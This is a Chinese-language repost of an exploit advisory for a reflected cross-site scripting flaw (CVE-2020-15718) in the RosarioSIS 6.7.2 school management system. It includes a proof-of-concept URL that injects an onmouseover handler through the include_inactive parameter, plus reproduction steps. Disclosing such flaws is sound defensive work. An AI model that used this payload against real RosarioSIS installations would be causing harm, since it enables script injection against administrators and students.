当前位置: 首页 > news >正文

RosarioSIS 6.7.2 跨站脚本(XSS)漏洞利用详情

news 2026/6/13 22:38:28

漏洞标题:RosarioSIS 6.7.2 - 跨站脚本(XSS)

日期:2025-11-25

漏洞作者:CodeSecLab

供应商主页:https://gitlab.com/francoisjacquet/rosariosis

软件链接:https://gitlab.com/francoisjacquet/rosariosis

版本:6.7.2

测试环境:Windows

CVE:CVE-2020-15718

概念验证(PoC)

http://rosariosis/Modules.php?modname=Scheduling/PrintSchedules.php&search_modfunc=list&include_inactive=" onmouseover="alert(1)"

复现步骤

  1. 以管理员用户身份登录。
  2. 发送上述请求。
  3. 观察结果。
    vFeWrvjTa1MAJGiVvh58g34NURJ0b57eIr+/Db+QwMo=

更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

公众号二维码

公众号二维码

http://www.rkmt.cn/news/177048.html

相关文章:

  • CNN图像分类项目落地:使用PyTorch-CUDA-v2.8镜像快速验证
  • 基于Java的塔吊安全监测智慧管理系统的设计与实现全方位解析:附毕设论文+源代码
  • Anaconda配置PyTorch环境不再难:结合CUDA镜像一步到位
  • 聊一聊国内顶尖的五大网络安全攻防实验室
  • 字符验证码的分割与识别思路
  • Docker Exec进入运行中容器:调试PyTorch应用现场
  • 云端智能体:AI Agent技术与应用研究报告(2025年)|附50页PDF文件下载
  • PyTorch Exponential Moving Average指数移动平均
  • 从数据到洞察:使用生长曲线科学解读儿童生长发育
  • CUDA Compute Capability计算能力:选择合适GPU型号
  • C#之跨线程调用UI
  • [NOIP2021] 棋局
  • PyTorch-CUDA-v2.8镜像安全性评估:是否适合企业级应用?
  • 【物理】模拟粒子在电场和磁场中的轨迹研究附Matlab代码
  • PyTorch-CUDA-v2.8镜像优势分析:为什么它适合你的大模型项目?
  • 第六十七篇
  • 从入门到精通:Nanoscope Analysis AFM数据处理全攻略
  • 【全栈前端老曹】2025年CSDN博客文章创作历程与技术心得年度总结
  • PyTorch LRScheduler学习率调度器种类大全
  • 【先进PID控制算法(ADRC,TD,ESO)加入永磁同步电机发电控制仿真模型研究附Matlab代码
  • CNN特征可视化方法:理解PyTorch模型决策过程
  • Conda虚拟环境 vs 镜像化环境:谁更适合PyTorch开发?
  • 配置Jenkins使用tag发布
  • CUDA Streams并发执行:重叠PyTorch计算与数据传输
  • Docker Top查看进程:观察PyTorch容器内部活动
  • Linux 的日志分析命令
  • CUDA共享内存优化:提升PyTorch张量操作效率
  • HuggingFace Trainer自定义训练循环:超越默认封装
  • CNN空洞卷积实现:PyTorch中atrous convolution应用
  • 长期投资在波动市场中的优势